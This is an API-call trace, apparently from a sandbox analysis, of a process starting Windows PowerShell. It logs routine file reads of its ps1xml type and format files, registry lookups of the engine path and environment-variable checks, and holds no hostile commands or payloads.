	[0734.554] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd160 | out: lpFileInformation=0xcd160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0734.554] SetErrorMode (uMode=0x1) returned 0x1
	[0734.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0734.555] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd248 | out: phkResult=0xcd248*=0x324) returned 0x0
	[0734.556] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd1cc, lpData=0x0, lpcbData=0xcd1c8*=0x0 | out: lpType=0xcd1cc*=0x1, lpData=0x0, lpcbData=0xcd1c8*=0x56) returned 0x0
	[0734.556] CoTaskMemAlloc (cb=0x5a) returned 0x1b804dc0
	[0734.556] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd19c, lpData=0x1b804dc0, lpcbData=0xcd198*=0x56 | out: lpType=0xcd19c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd198*=0x56) returned 0x0
	[0734.556] CoTaskMemFree (pv=0x1b804dc0) 
	[0734.556] RegCloseKey (hKey=0x324) returned 0x0
	[0734.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0734.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0736.137] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0736.149] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0736.149] GetFileType (hFile=0x324) returned 0x1
	[0736.149] SetErrorMode (uMode=0x1) returned 0x1
	[0736.149] GetFileType (hFile=0x324) returned 0x1
	[0736.149] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.150] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.150] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.151] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.151] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.153] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.153] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.153] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0736.153] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.572] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.572] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.572] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.572] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.573] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.573] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.573] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.574] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.576] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.577] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.577] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.577] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.578] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.578] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.578] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.578] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.579] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.579] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.579] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.580] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.580] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.580] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.580] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.581] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.598] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.598] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.599] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.599] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.599] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.599] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.600] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.600] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0737.600] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x1b4, lpOverlapped=0x0) returned 1
	[0737.600] ReadFile (in: hFile=0x324, lpBuffer=0x2e24748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2e24748*, lpNumberOfBytesRead=0xcd1e8*=0x0, lpOverlapped=0x0) returned 1
	[0737.601] CloseHandle (hObject=0x324) returned 1
	[0737.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0737.601] SetErrorMode (uMode=0x1) returned 0x1
	[0737.601] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd160 | out: lpFileInformation=0xcd160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0737.601] SetErrorMode (uMode=0x1) returned 0x1
	[0737.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0737.601] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd248 | out: phkResult=0xcd248*=0x324) returned 0x0
	[0737.602] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd1cc, lpData=0x0, lpcbData=0xcd1c8*=0x0 | out: lpType=0xcd1cc*=0x1, lpData=0x0, lpcbData=0xcd1c8*=0x56) returned 0x0
	[0737.602] CoTaskMemAlloc (cb=0x5a) returned 0x1b805610
	[0737.602] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd19c, lpData=0x1b805610, lpcbData=0xcd198*=0x56 | out: lpType=0xcd19c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd198*=0x56) returned 0x0
	[0737.602] CoTaskMemFree (pv=0x1b805610) 
	[0737.602] RegCloseKey (hKey=0x324) returned 0x0
	[0737.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0737.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0744.745] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0746.223] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0750.186] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0750.186] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0750.187] CoTaskMemFree (pv=0x27bac0) 
	[0751.520] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3e8 | out: phkResult=0xcd3e8*=0x2ec) returned 0x0
	[0751.521] RegQueryValueExW (in: hKey=0x2ec, lpValueName="path", lpReserved=0x0, lpType=0xcd3fc, lpData=0x0, lpcbData=0xcd3f8*=0x0 | out: lpType=0xcd3fc*=0x1, lpData=0x0, lpcbData=0xcd3f8*=0x74) returned 0x0
	[0751.521] RegQueryValueExW (in: hKey=0x2ec, lpValueName="path", lpReserved=0x0, lpType=0xcd36c, lpData=0x0, lpcbData=0xcd368*=0x0 | out: lpType=0xcd36c*=0x1, lpData=0x0, lpcbData=0xcd368*=0x74) returned 0x0
	[0751.521] CoTaskMemAlloc (cb=0x78) returned 0x2c08a0
	[0751.521] RegQueryValueExW (in: hKey=0x2ec, lpValueName="path", lpReserved=0x0, lpType=0xcd33c, lpData=0x2c08a0, lpcbData=0xcd338*=0x74 | out: lpType=0xcd33c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd338*=0x74) returned 0x0
	[0751.521] CoTaskMemFree (pv=0x2c08a0) 
	[0751.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0751.521] SetErrorMode (uMode=0x1) returned 0x1
	[0751.521] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd2c0 | out: lpFileInformation=0xcd2c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0751.522] SetErrorMode (uMode=0x1) returned 0x1
	[0751.522] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0751.522] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0751.522] CoTaskMemFree (pv=0x27bac0) 
	[0751.525] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0751.525] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0751.525] CoTaskMemFree (pv=0x27bac0) 
	[0751.525] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0751.525] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0751.525] CoTaskMemFree (pv=0x27bac0) 
	[0751.526] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0751.526] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0751.526] CoTaskMemFree (pv=0x27bac0) 
	[0751.526] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0751.526] GetFileType (hFile=0x318) returned 0x1
	[0751.526] SetErrorMode (uMode=0x1) returned 0x1
	[0751.526] GetFileType (hFile=0x318) returned 0x1
	[0751.527] ReadFile (in: hFile=0x318, lpBuffer=0x34cc160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34cc160*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0751.528] ReadFile (in: hFile=0x318, lpBuffer=0x34cc160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34cc160*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0751.528] ReadFile (in: hFile=0x318, lpBuffer=0x34cc160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34cc160*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0751.529] ReadFile (in: hFile=0x318, lpBuffer=0x34cc160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34cc160*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0751.529] ReadFile (in: hFile=0x318, lpBuffer=0x34cc160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34cc160*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0751.530] ReadFile (in: hFile=0x318, lpBuffer=0x34cc160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34cc160*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0751.530] ReadFile (in: hFile=0x318, lpBuffer=0x34cc160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34cc160*, lpNumberOfBytesRead=0xccf58*=0x9e2, lpOverlapped=0x0) returned 1
	[0751.530] ReadFile (in: hFile=0x318, lpBuffer=0x34cb6aa, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34cb6aa*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0751.530] ReadFile (in: hFile=0x318, lpBuffer=0x34cc160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34cc160*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0751.530] CloseHandle (hObject=0x318) returned 1
	[0751.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0751.531] SetErrorMode (uMode=0x1) returned 0x1
	[0751.531] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf00 | out: lpFileInformation=0xccf00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0751.531] SetErrorMode (uMode=0x1) returned 0x1
	[0751.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0751.531] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x318) returned 0x0
	[0751.532] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf6c, lpData=0x0, lpcbData=0xccf68*=0x0 | out: lpType=0xccf6c*=0x1, lpData=0x0, lpcbData=0xccf68*=0x56) returned 0x0
